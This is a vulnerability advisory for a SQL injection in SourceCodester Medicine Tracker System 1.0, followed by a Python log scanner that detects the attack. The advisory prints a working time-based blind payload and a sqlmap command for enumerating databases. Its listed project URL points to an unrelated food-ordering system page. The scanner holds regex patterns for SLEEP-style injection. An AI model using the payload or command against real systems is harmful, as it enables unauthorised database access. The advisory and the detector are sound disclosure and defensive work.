SQL injection vulnerability discovered in SourceCodester Medicine Tracker System (Master.php)
CVE-2024-6419
A vulnerability classified as critical was found in SourceCodester Medicine Tracker System 1.0. This vulnerability affects unknown code of the file /classes/Master.php?f=save_medicine. The manipulation of the argument id leads to SQL injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-270010 is the identifier assigned to this vulnerability.
Affected Project: SourceCodester Medicine Tracker System 1.0
Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html
Version: 1.0
Related Code file: /php-mts/classes/Master.php
Injection parameter: POST parameter ‘id’ is vulnerable
Demonstration
Below is /php-mts/app/?page=medicines/manage_medicine:
Let’s intercept the traffic using Burp Suite:
After saving the request as master.txt, we run sqlmap against it:
The POST parameter ‘id’ is found to be vulnerable. Below is the sqlmap output showing the payload used:
---
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 8594 FROM (SELECT(SLEEP(5)))EJYb) AND 'npqn'='npqn&name=teest&description=test
---
sqlmap -r master.txt --batch --dbs
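As an added detection example (not part of the advisory or the project's code), the following Python flags form submissions whose fields carry the time-based blind pattern seen in the sqlmap output above: a quote breakout followed by a delay primitive such as SLEEP(). The log line format, IP addresses and benign request are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Delay primitives used by time-based blind SQL injection on common engines.
# The opening parenthesis is required so that free text such as
# "helps with sleep" in a description field does not produce a hit.
DELAY_FUNCS = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay\b", re.IGNORECASE
)
# A quote followed by AND/OR is the usual sign of closing a string literal
# before appending an injected condition, as in the advisory's payload.
BREAKOUT = re.compile(r"['\"]\s*(?:and|or)\b", re.IGNORECASE)


def suspicious_params(body: str) -> dict:
    """Return {param: decoded_value} for form fields that combine a
    quote breakout with a delay primitive. parse_qsl percent-decodes
    values and turns '+' into spaces, so the regexes see plain SQL."""
    hits = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if DELAY_FUNCS.search(value) and BREAKOUT.search(value):
            hits[key] = value
    return hits


# Constructed log lines: "<client ip> <method> <path> <url-encoded form body>".
SAMPLE_LOG = [
    # Legitimate save of a medicine record; "sleep" appears only as prose.
    "203.0.113.5 POST /php-mts/classes/Master.php?f=save_medicine "
    "id=12&name=Aspirin&description=helps+with+sleep",
    # The sqlmap payload from the advisory, URL-encoded as sent on the wire.
    "203.0.113.9 POST /php-mts/classes/Master.php?f=save_medicine "
    "id=%27+AND+%28SELECT+8594+FROM+%28SELECT%28SLEEP%285%29%29%29EJYb%29"
    "+AND+%27npqn%27%3D%27npqn&name=teest&description=test",
]


def scan_log(lines) -> list:
    """Return (client_ip, path, parameter) tuples worth alerting on."""
    alerts = []
    for line in lines:
        ip, _method, path, body = line.split(" ", 3)
        for param in suspicious_params(body):
            alerts.append((ip, path, param))
    return alerts


if __name__ == "__main__":
    for ip, path, param in scan_log(SAMPLE_LOG):
        print(f"time-based SQLi attempt from {ip} on {path}, parameter {param}")
```

Pair a hit with the response time of the same request (the SLEEP(5) in the payload shows up as a multi-second delay) to separate confirmed injections from scanner noise.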